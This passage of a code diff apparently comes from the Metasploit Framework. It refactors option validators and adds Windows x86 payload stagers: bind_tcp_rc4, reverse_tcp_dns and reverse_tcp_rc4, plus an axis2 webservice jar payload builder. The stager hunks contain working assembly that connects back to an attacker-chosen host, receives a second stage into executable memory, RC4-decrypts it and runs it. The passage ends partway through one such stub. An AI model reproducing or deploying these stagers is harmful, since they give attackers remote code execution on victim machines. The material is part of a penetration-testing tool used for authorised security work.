return false if (value.nil? || value.to_s.empty?)
|
||||
end
|
||||
if regex
|
||||
if value.match(regex)
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
return !!value.match(regex)
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
|
|
@ -15,7 +15,7 @@ class OptBool < OptBase
|
|||
return 'bool'
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
def valid?(value, check_empty: true)
|
||||
return false if empty_required_value?(value)
|
||||
|
||||
if ((value != nil and
|
||||
|
|
|
@ -13,8 +13,8 @@ class OptEnum < OptBase
|
|||
return 'enum'
|
||||
end
|
||||
|
||||
def valid?(value=self.value)
|
||||
return false if empty_required_value?(value)
|
||||
def valid?(value=self.value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
return true if value.nil? and !required?
|
||||
|
||||
(value and self.enums.include?(value.to_s))
|
||||
|
|
|
@ -13,18 +13,19 @@ class OptInt < OptBase
|
|||
end
|
||||
|
||||
def normalize(value)
|
||||
if (value.to_s.match(/^0x[a-fA-F\d]+$/))
|
||||
if value.to_s.match(/^0x[a-fA-F\d]+$/)
|
||||
value.to_i(16)
|
||||
else
|
||||
elsif value.present?
|
||||
value.to_i
|
||||
else
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
return super if !required? and value.to_s.empty?
|
||||
return false if empty_required_value?(value)
|
||||
def valid?(value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
|
||||
if value and not value.to_s.match(/^0x[0-9a-fA-F]+$|^-?\d+$/)
|
||||
if value.present? and not value.to_s.match(/^0x[0-9a-fA-F]+$|^-?\d+$/)
|
||||
return false
|
||||
end
|
||||
|
||||
|
|
|
@ -12,18 +12,22 @@ class OptPath < OptBase
|
|||
return 'path'
|
||||
end
|
||||
|
||||
def normalize(value)
|
||||
value.nil? ? value : File.expand_path(value)
|
||||
end
|
||||
|
||||
def validate_on_assignment?
|
||||
false
|
||||
end
|
||||
|
||||
# Generally, 'value' should be a file that exists.
|
||||
def valid?(value)
|
||||
return false if empty_required_value?(value)
|
||||
def valid?(value, check_empty: true)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
if value and !value.empty?
|
||||
if value =~ /^memory:\s*([0-9]+)/i
|
||||
return false unless check_memory_location($1)
|
||||
else
|
||||
unless File.exists?(value)
|
||||
unless File.exist?(File.expand_path(value))
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
|
|
@ -12,12 +12,9 @@ class OptPort < OptInt
|
|||
return 'port'
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
if !required? and value.to_s.empty?
|
||||
super
|
||||
else
|
||||
super && normalize(value) <= 65535 && normalize(value) >= 0
|
||||
end
|
||||
def valid?(value, check_empty: true)
|
||||
port = normalize(value).to_i
|
||||
super && port <= 65535 && port >= 0
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -12,16 +12,16 @@ class OptRegexp < OptBase
|
|||
return 'regexp'
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
unless super
|
||||
def valid?(value, check_empty: true)
|
||||
if check_empty && empty_required_value?(value)
|
||||
return false
|
||||
elsif value.nil?
|
||||
return true
|
||||
end
|
||||
return true if (not required? and value.nil?)
|
||||
|
||||
begin
|
||||
Regexp.compile(value)
|
||||
|
||||
return true
|
||||
return super
|
||||
rescue RegexpError, TypeError
|
||||
return false
|
||||
end
|
||||
|
|
|
@ -28,9 +28,9 @@ class OptString < OptBase
|
|||
value
|
||||
end
|
||||
|
||||
def valid?(value=self.value)
|
||||
def valid?(value=self.value, check_empty: true)
|
||||
value = normalize(value)
|
||||
return false if empty_required_value?(value)
|
||||
return false if check_empty && empty_required_value?(value)
|
||||
return super
|
||||
end
|
||||
end
|
||||
|
|
|
@ -107,5 +107,41 @@ module Msf::Payload::Java
|
|||
zip
|
||||
end
|
||||
|
||||
end
|
||||
#
|
||||
# Used by stagers to create a axis2 webservice file as a {Rex::Zip::Jar}.
|
||||
# Stagers define a list of class files in @class_files which are pulled
|
||||
# from the MetasploitPayloads gem. The configuration file is created by
|
||||
# the payload's #config method.
|
||||
#
|
||||
# @option :app_name [String] Name of the Service in services.xml. Defaults to random.
|
||||
# @return [Rex::Zip::Jar]
|
||||
def generate_axis2(opts={})
|
||||
raise if not respond_to? :config
|
||||
|
||||
app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)
|
||||
|
||||
services_xml = %Q{<service name="#{app_name}" scope="application">
|
||||
<description>#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}</description>
|
||||
<parameter name="ServiceClass">metasploit.PayloadServlet</parameter>
|
||||
<operation name="run">
|
||||
<messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
|
||||
</operation>
|
||||
</service>
|
||||
}
|
||||
|
||||
paths = [
|
||||
[ 'metasploit', 'Payload.class' ],
|
||||
[ 'metasploit', 'PayloadServlet.class' ]
|
||||
] + @class_files
|
||||
|
||||
zip = Rex::Zip::Jar.new
|
||||
zip.add_file('META-INF/', '')
|
||||
zip.add_file('META-INF/services.xml', services_xml)
|
||||
zip.add_files(paths, MetasploitPayloads.path('java'))
|
||||
zip.add_file('metasploit.dat', config)
|
||||
zip.build_manifest(:app_name => app_name)
|
||||
|
||||
zip
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -48,6 +48,7 @@ module Payload::Python::ReverseHttp
|
|||
|
||||
target_url << ':'
|
||||
target_url << opts[:port].to_s
|
||||
target_url << luri
|
||||
target_url << generate_callback_uri(opts)
|
||||
target_url
|
||||
end
|
||||
|
@ -56,7 +57,7 @@ module Payload::Python::ReverseHttp
|
|||
# Return the longest URI that fits into our available space
|
||||
#
|
||||
def generate_callback_uri(opts={})
|
||||
uri_req_len = 30 + rand(256-30)
|
||||
uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
|
||||
|
||||
# Generate the short default URL if we don't have enough space
|
||||
if self.available_space.nil? || required_space > self.available_space
|
||||
|
|
|
@ -50,7 +50,7 @@ module Msf::Payload::TransportConfig
|
|||
unless uri
|
||||
type = opts[:stageless] == true ? :init_connect : :connect
|
||||
sum = uri_checksum_lookup(type)
|
||||
uri = generate_uri_uuid(sum, opts[:uuid])
|
||||
uri = luri + generate_uri_uuid(sum, opts[:uuid])
|
||||
end
|
||||
|
||||
{
|
||||
|
|
|
@ -72,6 +72,7 @@ module Payload::Windows::BindTcp
|
|||
start:
|
||||
pop ebp
|
||||
#{asm_bind_tcp(opts)}
|
||||
#{asm_block_recv(opts)}
|
||||
^
|
||||
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||
end
|
||||
|
@ -192,7 +193,17 @@ module Payload::Windows::BindTcp
|
|||
|
||||
asm << asm_send_uuid if include_send_uuid
|
||||
|
||||
asm << %Q^
|
||||
asm
|
||||
end
|
||||
|
||||
#
|
||||
# Generate an assembly stub with the configured feature set and options.
|
||||
#
|
||||
# @option opts [Bool] :reliable Whether or not to enable error handling code
|
||||
#
|
||||
def asm_block_recv(opts={})
|
||||
reliable = opts[:reliable]
|
||||
asm = %Q^
|
||||
recv:
|
||||
; Receive the size of the incoming second stage...
|
||||
push 0 ; flags
|
||||
|
|
|
@ -0,0 +1,158 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/transport_config'
|
||||
require 'msf/core/payload/windows/bind_tcp'
|
||||
require 'msf/core/payload/windows/rc4'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# Complex bind_tcp_rc4 payload generation for Windows ARCH_X86
|
||||
#
|
||||
###
|
||||
|
||||
module Payload::Windows::BindTcpRc4
|
||||
|
||||
include Msf::Payload::TransportConfig
|
||||
include Msf::Payload::Windows::BindTcp
|
||||
include Msf::Payload::Windows::Rc4
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
xorkey: xorkey,
|
||||
rc4key: rc4key,
|
||||
reliable: false
|
||||
}
|
||||
|
||||
# Generate the more advanced stager if we have the space
|
||||
unless self.available_space.nil? || required_space > self.available_space
|
||||
conf[:exitfunk] = datastore['EXITFUNC'],
|
||||
conf[:reliable] = true
|
||||
end
|
||||
|
||||
generate_bind_tcp_rc4(conf)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate and compile the stager
|
||||
#
|
||||
def generate_bind_tcp_rc4(opts={})
|
||||
combined_asm = %Q^
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
#{asm_block_api}
|
||||
start:
|
||||
pop ebp
|
||||
#{asm_bind_tcp(opts)}
|
||||
#{asm_block_recv_rc4(opts)}
|
||||
^
|
||||
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||
end
|
||||
|
||||
def asm_block_recv_rc4(opts={})
|
||||
xorkey = Rex::Text.to_dword(opts[:xorkey]).chomp
|
||||
reliable = opts[:reliable]
|
||||
asm = %Q^
|
||||
recv:
|
||||
; Receive the size of the incoming second stage...
|
||||
push 0 ; flags
|
||||
push 4 ; length = sizeof( DWORD );
|
||||
push esi ; the 4 byte buffer on the stack to hold the second stage length
|
||||
push edi ; the saved socket
|
||||
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
|
||||
call ebp ; recv( s, &dwLength, 4, 0 );
|
||||
^
|
||||
|
||||
# Check for a failed recv() call
|
||||
if reliable
|
||||
asm << %Q^
|
||||
cmp eax, 0
|
||||
jle failure
|
||||
^
|
||||
end
|
||||
|
||||
asm << %Q^
|
||||
; Alloc a RWX buffer for the second stage
|
||||
mov esi, [esi] ; dereference the pointer to the second stage length
|
||||
xor esi, #{xorkey} ; XOR the stage length
|
||||
lea ecx, [esi+0x100] ; ECX = stage length + S-box length (alloc length)
|
||||
push 0x40 ; PAGE_EXECUTE_READWRITE
|
||||
push 0x1000 ; MEM_COMMIT
|
||||
; push esi ; push the newly recieved second stage length.
|
||||
push ecx ; push the alloc length
|
||||
push 0 ; NULL as we dont care where the allocation is.
|
||||
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
|
||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
; Receive the second stage and execute it...
|
||||
; xchg ebx, eax ; ebx = our new memory address for the new stage + S-box
|
||||
lea ebx, [eax+0x100] ; EBX = new stage address
|
||||
push ebx ; push the address of the new stage so we can return into it
|
||||
push esi ; push stage length
|
||||
push eax ; push the address of the S-box
|
||||
read_more: ;
|
||||
push 0 ; flags
|
||||
push esi ; length
|
||||
push ebx ; the current address into our second stage's RWX buffer
|
||||
push edi ; the saved socket
|
||||
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
|
||||
call ebp ; recv( s, buffer, length, 0 );
|
||||
^
|
||||
|
||||
# Check for a failed recv() call
|
||||
if reliable
|
||||
asm << %Q^
|
||||
cmp eax, 0
|
||||
jle failure
|
||||
^
|
||||
end
|
||||
|
||||
asm << %Q^
|
||||
read_successful:
|
||||
add ebx, eax ; buffer += bytes_received
|
||||
sub esi, eax ; length -= bytes_received
|
||||
; test esi, esi ; test length
|
||||
jnz read_more ; continue if we have more to read
|
||||
pop ebx ; address of S-box
|
||||
pop ecx ; stage length
|
||||
pop ebp ; address of stage
|
||||
push ebp ; push back so we can return into it
|
||||
push edi ; save socket
|
||||
mov edi, ebx ; address of S-box
|
||||
call after_key ; Call after_key, this pushes the address of the key onto the stack.
|
||||
db #{raw_to_db(opts[:rc4key])}
|
||||
after_key:
|
||||
pop esi ; ESI = RC4 key
|
||||
#{asm_decrypt_rc4}
|
||||
pop edi ; restore socket
|
||||
ret ; return into the second stage
|
||||
^
|
||||
|
||||
if reliable
|
||||
if opts[:exitfunk]
|
||||
asm << %Q^
|
||||
failure:
|
||||
^
|
||||
asm << asm_exitfunk(opts)
|
||||
else
|
||||
asm << %Q^
|
||||
failure:
|
||||
push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
|
||||
call ebp
|
||||
^
|
||||
end
|
||||
end
|
||||
|
||||
asm
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
@ -0,0 +1,98 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# RC4 decryption stub for Windows ARCH_X86 payloads
|
||||
#
|
||||
###
|
||||
module Payload::Windows::Rc4
|
||||
#
|
||||
# Register rc4 specific options
|
||||
#
|
||||
def initialize(*args)
|
||||
super
|
||||
register_options([ OptString.new('RC4PASSWORD', [true, 'Password to derive RC4 key from', 'msf']) ], self.class)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate assembly code that decrypts RC4 shellcode in-place
|
||||
#
|
||||
|
||||
def asm_decrypt_rc4
|
||||
%!
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Author: Michael Schierl (schierlm[at]gmx[dot]de)
|
||||
; Version: 1.0 (29 December 2012)
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Input: EBP - Data to decode
|
||||
; ECX - Data length
|
||||
; ESI - Key (16 bytes for simplicity)
|
||||
; EDI - pointer to 0x100 bytes scratch space for S-box
|
||||
; Direction flag has to be cleared
|
||||
; Output: None. Data is decoded in place.
|
||||
; Clobbers: EAX, EBX, ECX, EDX, EBP (stack is not used)
|
||||
|
||||
; Initialize S-box
|
||||
xor eax, eax ; Start with 0
|
||||
init:
|
||||
stosb ; Store next S-Box byte S[i] = i
|
||||
inc al ; increase byte to write (EDI is increased automatically)
|
||||
jnz init ; loop until we wrap around
|
||||
sub edi, 0x100 ; restore EDI
|
||||
; permute S-box according to key
|
||||
xor ebx, ebx ; Clear EBX (EAX is already cleared)
|
||||
permute:
|
||||
add bl, [edi+eax] ; BL += S[AL] + KEY[AL % 16]
|
||||
mov edx, eax
|
||||
and dl, 0xF
|
||||
add bl, [esi+edx]
|
||||
mov dl, [edi+eax] ; swap S[AL] and S[BL]
|
||||
xchg dl, [edi+ebx]
|
||||
mov [edi+eax], dl
|
||||
inc al ; AL += 1 until we wrap around
|
||||
jnz permute
|
||||
; decryption loop
|
||||
xor ebx, ebx ; Clear EBX (EAX is already cleared)
|
||||
decrypt:
|
||||
inc al ; AL += 1
|
||||
add bl, [edi+eax] ; BL += S[AL]
|
||||
mov dl, [edi+eax] ; swap S[AL] and S[BL]
|
||||
xchg dl, [edi+ebx]
|
||||
mov [edi+eax], dl
|
||||
add dl, [edi+ebx] ; DL = S[AL]+S[BL]
|
||||
mov dl, [edi+edx] ; DL = S[DL]
|
||||
xor [ebp], dl ; [EBP] ^= DL
|
||||
inc ebp ; advance data pointer
|
||||
dec ecx ; reduce counter
|
||||
jnz decrypt ; until finished
|
||||
!
|
||||
end
|
||||
|
||||
def generate_stage(opts = {})
|
||||
p = super(opts)
|
||||
xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
|
||||
c1 = OpenSSL::Cipher::Cipher.new('RC4')
|
||||
c1.decrypt
|
||||
c1.key = rc4key
|
||||
p = c1.update(p)
|
||||
[ p.length ^ xorkey.unpack('V')[0] ].pack('V') + p
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(_conn, _payload)
|
||||
false
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
def rc4_keys(rc4pass = '')
|
||||
m = OpenSSL::Digest.new('sha1')
|
||||
m.reset
|
||||
key = m.digest(rc4pass)
|
||||
[key[0, 4], key[4, 16]]
|
||||
end
|
||||
end
|
||||
end
|
|
@ -51,7 +51,7 @@ module Payload::Windows::ReverseHttp
|
|||
|
||||
# Add extra options if we have enough space
|
||||
unless self.available_space.nil? || required_space > self.available_space
|
||||
conf[:url] = generate_uri
|
||||
conf[:url] = luri + generate_uri
|
||||
conf[:exitfunk] = datastore['EXITFUNC']
|
||||
conf[:ua] = datastore['MeterpreterUserAgent']
|
||||
conf[:proxy_host] = datastore['PayloadProxyHost']
|
||||
|
@ -61,7 +61,7 @@ module Payload::Windows::ReverseHttp
|
|||
conf[:proxy_type] = datastore['PayloadProxyType']
|
||||
else
|
||||
# Otherwise default to small URIs
|
||||
conf[:url] = generate_small_uri
|
||||
conf[:url] = luri + generate_small_uri
|
||||
end
|
||||
|
||||
generate_reverse_http(conf)
|
||||
|
@ -98,7 +98,7 @@ module Payload::Windows::ReverseHttp
|
|||
|
||||
# Choose a random URI length between 30 and 255 bytes
|
||||
if uri_req_len == 0
|
||||
uri_req_len = 30 + rand(256-30)
|
||||
uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
|
||||
end
|
||||
|
||||
if uri_req_len < 5
|
||||
|
|
|
@ -65,6 +65,7 @@ module Payload::Windows::ReverseTcp
|
|||
start:
|
||||
pop ebp
|
||||
#{asm_reverse_tcp(opts)}
|
||||
#{asm_block_recv(opts)}
|
||||
^
|
||||
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||
end
|
||||
|
@ -93,12 +94,11 @@ module Payload::Windows::ReverseTcp
|
|||
#
|
||||
# @option opts [Fixnum] :port The port to connect to
|
||||
# @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
|
||||
# @option opts [Bool] :reliable Whether or not to enable error handling code
|
||||
# @option opts [Fixnum] :retry_count Number of retry attempts
|
||||
#
|
||||
def asm_reverse_tcp(opts={})
|
||||
|
||||
retry_count = [opts[:retry_count].to_i, 1].max
|
||||
reliable = opts[:reliable]
|
||||
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
|
||||
encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first
|
||||
|
||||
|
@ -153,7 +153,7 @@ module Payload::Windows::ReverseTcp
|
|||
|
||||
handle_connect_failure:
|
||||
; decrement our attempt count and try again
|
||||
dec [esi+8]
|
||||
dec dword [esi+8]
|
||||
jnz try_connect
|
||||
^
|
||||
|
||||
|
@ -178,7 +178,17 @@ module Payload::Windows::ReverseTcp
|
|||
|
||||
asm << asm_send_uuid if include_send_uuid
|
||||
|
||||
asm << %Q^
|
||||
asm
|
||||
end
|
||||
|
||||
#
|
||||
# Generate an assembly stub with the configured feature set and options.
|
||||
#
|
||||
# @option opts [Bool] :reliable Whether or not to enable error handling code
|
||||
#
|
||||
def asm_block_recv(opts={})
|
||||
reliable = opts[:reliable]
|
||||
asm = %Q^
|
||||
recv:
|
||||
; Receive the size of the incoming second stage...
|
||||
push 0 ; flags
|
||||
|
|
|
@ -0,0 +1,167 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/transport_config'
|
||||
require 'msf/core/payload/windows/reverse_tcp'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# Complex reverse_tcp payload generation for Windows ARCH_X86
|
||||
#
|
||||
###
|
||||
|
||||
module Payload::Windows::ReverseTcpDns
|
||||
|
||||
include Msf::Payload::TransportConfig
|
||||
include Msf::Payload::Windows::ReverseTcp
|
||||
|
||||
#
|
||||
# Register dns specific options
|
||||
#
|
||||
def initialize(*args)
|
||||
super
|
||||
# Overload LHOST as a String value for the hostname
|
||||
register_options([ OptString.new("LHOST", [true, "The DNS hostname to connect back to"]) ], self.class)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
host: datastore['LHOST'],
|
||||
retry_count: datastore['ReverseConnectRetries'],
|
||||
reliable: false
|
||||
}
|
||||
|
||||
# Generate the advanced stager if we have space
|
||||
unless self.available_space.nil? || required_space > self.available_space
|
||||
conf[:exitfunk] = datastore['EXITFUNC']
|
||||
conf[:reliable] = true
|
||||
end
|
||||
|
||||
generate_reverse_tcp_dns(conf)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate and compile the stager
|
||||
#
|
||||
def generate_reverse_tcp_dns(opts={})
|
||||
combined_asm = %Q^
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
#{asm_block_api}
|
||||
start:
|
||||
pop ebp
|
||||
#{asm_reverse_tcp_dns(opts)}
|
||||
#{asm_block_recv(opts)}
|
||||
^
|
||||
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||
end
|
||||
|
||||
#
|
||||
# Generate an assembly stub with the configured feature set and options.
|
||||
#
|
||||
# @option opts [Fixnum] :port The port to connect to
|
||||
# @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
|
||||
# @option opts [Fixnum] :retry_count Number of retry attempts
|
||||
#
|
||||
def asm_reverse_tcp_dns(opts={})
|
||||
|
||||
retry_count = [opts[:retry_count].to_i, 1].max
|
||||
encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first
|
||||
|
||||
asm = %Q^
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: EDI will be the socket for the connection to the server
|
||||
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
|
||||
|
||||
reverse_tcp:
|
||||
push '32' ; Push the bytes 'ws2_32',0,0 onto the stack.
|
||||
push 'ws2_' ; ...
|
||||
push esp ; Push a pointer to the "ws2_32" string on the stack.
|
||||
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
|
||||
call ebp ; LoadLibraryA( "ws2_32" )
|
||||
|
||||
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
|
||||
sub esp, eax ; alloc some space for the WSAData structure
|
||||
push esp ; push a pointer to this stuct
|
||||
push eax ; push the wVersionRequested parameter
|
||||
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
|
||||
call ebp ; WSAStartup( 0x0190, &WSAData );
|
||||
|
||||
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
|
||||
push eax ; push null for reserved parameter
|
||||
push eax ; we do not specify a WSAPROTOCOL_INFO structure
|
||||
push eax ; we do not specify a protocol
|
||||
inc eax ;
|
||||
push eax ; push SOCK_STREAM
|
||||
inc eax ;
|
||||
push eax ; push AF_INET
|
||||
push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
|
||||
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
||||
xchg edi, eax ; save the socket for later, don't care about the value of eax after this
|
||||
|
||||
create_socket:
|
||||
call got_hostname
|
||||
|
||||
hostname:
|
||||
db "#{opts[:host]}", 0x00
|
||||
|
||||
got_hostname:
|
||||
push #{Rex::Text.block_api_hash( "ws2_32.dll", "gethostbyname" )}
|
||||
call ebp ; gethostbyname( "name" );
|
||||
|
||||
set_address:
|
||||
mov eax, [eax+28] ; names
|
||||
push #{retry_count} ; retry counter
|
||||
push eax ; host address
|
||||
push #{encoded_port} ; family AF_INET and port number
|
||||
mov esi, esp ; save pointer to sockaddr struct
|
||||
|
||||
try_connect:
|
||||
push 16 ; length of the sockaddr struct
|
||||
push esi ; pointer to the sockaddr struct
|
||||
push edi ; the socket
|
||||
push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
|
||||
call ebp ; connect( s, &sockaddr, 16 );
|
||||
|
||||
test eax,eax ; non-zero means a failure
|
||||
jz connected
|
||||
|
||||
handle_connect_failure:
|
||||
; decrement our attempt count and try again
|
||||
dec dword [esi+8]
|
||||
jnz try_connect
|
||||
^
|
||||
|
||||
if opts[:exitfunk]
|
||||
asm << %Q^
|
||||
failure:
|
||||
call exitfunk
|
||||
^
|
||||
else
|
||||
asm << %Q^
|
||||
failure:
|
||||
push 0x56A2B5F0 ; hardcoded to exitprocess for size
|
||||
call ebp
|
||||
^
|
||||
end
|
||||
|
||||
asm << %Q^
|
||||
; this lable is required so that reconnect attempts include
|
||||
; the UUID stuff if required.
|
||||
connected:
|
||||
^
|
||||
|
||||
asm << asm_send_uuid if include_send_uuid
|
||||
|
||||
asm
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,180 @@
|
|||
# -*- coding: binary -*-
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/transport_config'
|
||||
require 'msf/core/payload/windows/reverse_tcp'
|
||||
require 'msf/core/payload/windows/rc4'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# Complex reverse_tcp_rc4 payload generation for Windows ARCH_X86
|
||||
#
|
||||
###
|
||||
|
||||
module Payload::Windows::ReverseTcpRc4
|
||||
|
||||
include Msf::Payload::TransportConfig
|
||||
include Msf::Payload::Windows::ReverseTcp
|
||||
include Msf::Payload::Windows::Rc4
|
||||
|
||||
#
|
||||
# Generate the first stage
|
||||
#
|
||||
def generate
|
||||
xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
|
||||
conf = {
|
||||
port: datastore['LPORT'],
|
||||
host: datastore['LHOST'],
|
||||
retry_count: datastore['ReverseConnectRetries'],
|
||||
xorkey: xorkey,
|
||||
rc4key: rc4key,
|
||||
reliable: false
|
||||
}
|
||||
|
||||
# Generate the advanced stager if we have space
|
||||
unless self.available_space.nil? || required_space > self.available_space
|
||||
conf[:exitfunk] = datastore['EXITFUNC']
|
||||
conf[:reliable] = true
|
||||
end
|
||||
|
||||
generate_reverse_tcp_rc4(conf)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate and compile the stager
|
||||
#
|
||||
def generate_reverse_tcp_rc4(opts={})
|
||||
combined_asm = %Q^
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
#{asm_block_api}
|
||||
start:
|
||||
pop ebp
|
||||
#{asm_reverse_tcp(opts)}
|
||||
#{asm_block_recv_rc4(opts)}
|
||||
^
|
||||
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
|
||||
end
|
||||
|
||||
#
|
||||
# Generate an assembly stub with the configured feature set and options.
|
||||
#
|
||||
# @option opts [Fixnum] :port The port to connect to
|
||||
# @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
|
||||
# @option opts [Bool] :reliable Whether or not to enable error handling code
|
||||
#
|
||||
def asm_block_recv_rc4(opts={})
|
||||
xorkey = Rex::Text.to_dword(opts[:xorkey]).chomp
|
||||
reliable = opts[:reliable]
|
||||
asm = %Q^
|
||||
recv:
|
||||
; Receive the size of the incoming second stage...
|
||||
push 0 ; flags
|
||||
push 4 ; length = sizeof( DWORD );
|
||||
push esi ; the 4 byte buffer on the stack to hold the second stage length
|
||||
push edi ; the saved socket
|
||||
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
|
||||
call ebp ; recv( s, &dwLength, 4, 0 );
|
||||
^
|
||||
|
||||
if reliable
|
||||
asm << %Q^
|
||||
; reliability: check to see if the recv worked, and reconnect
|
||||
; if it fails
|
||||
cmp eax, 0
|
||||
jle cleanup_socket
|
||||
^
|
||||
end
|
||||
|
||||
asm << %Q^
|
||||
; Alloc a RWX buffer for the second stage
|
||||
mov esi, [esi] ; dereference the pointer to the second stage length
|
||||
xor esi, #{xorkey} ; XOR the stage length
|
||||
lea ecx, [esi+0x100] ; ECX = stage length + S-box length (alloc length)
|
||||
push 0x40 ; PAGE_EXECUTE_READWRITE
|
||||
push 0x1000 ; MEM_COMMIT
|
||||
; push esi ; push the newly recieved second stage length.
|
||||
push ecx ; push the alloc length
|
||||
push 0 ; NULL as we dont care where the allocation is.
|
||||
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
|
||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
; Receive the second stage and execute it...
|
||||
; xchg ebx, eax ; ebx = our new memory address for the new stage + S-box
|
||||
lea ebx, [eax+0x100] ; EBX = new stage address
|
||||
push ebx ; push the address of the new stage so we can return into it
|
||||
push esi ; push stage length
|
||||
push eax ; push the address of the S-box
|
||||
read_more: ;
|
||||
push 0 ; flags
|
||||
push esi ; length
|
||||
push ebx ; the current address into our second stage's RWX buffer
|
||||
push edi ; the saved socket
|
||||
push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
|
||||
call ebp ; recv( s, buffer, length, 0 );
|
||||
^
|
||||
|
||||
if reliable
|
||||
asm << %Q^
|
||||
; reliability: check to see if the recv worked, and reconnect
|
||||
; if it fails
|
||||
cmp eax, 0
|
||||
jge read_successful
|
||||
|
||||
; something failed, free up memory
|
||||
pop eax ; get the address of the payload
|
||||
push 0x4000 ; dwFreeType (MEM_DECOMMIT)
|
||||
push 0 ; dwSize
|
||||
push eax ; lpAddress
|
||||
push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
|
||||
call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT)
|
||||
|
||||
cleanup_socket:
|
||||
; clear up the socket
|
||||
push edi ; socket handle
|
||||
push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
|
||||
call ebp ; closesocket(socket)
|
||||
|
||||
; restore the stack back to the connection retry count
|
||||
pop esi
|
||||
pop esi
|
||||
dec [esp] ; decrement the counter
|
||||
|
||||
; try again
|
||||
jmp create_socket
|
||||
^
|
||||
end
|
||||
|
||||
asm << %Q^
|
||||
read_successful:
|
||||
add ebx, eax ; buffer += bytes_received
|
||||
sub esi, eax ; length -= bytes_received
|
||||
; test esi, esi ; test length
|
||||
jnz read_more ; continue if we have more to read
|
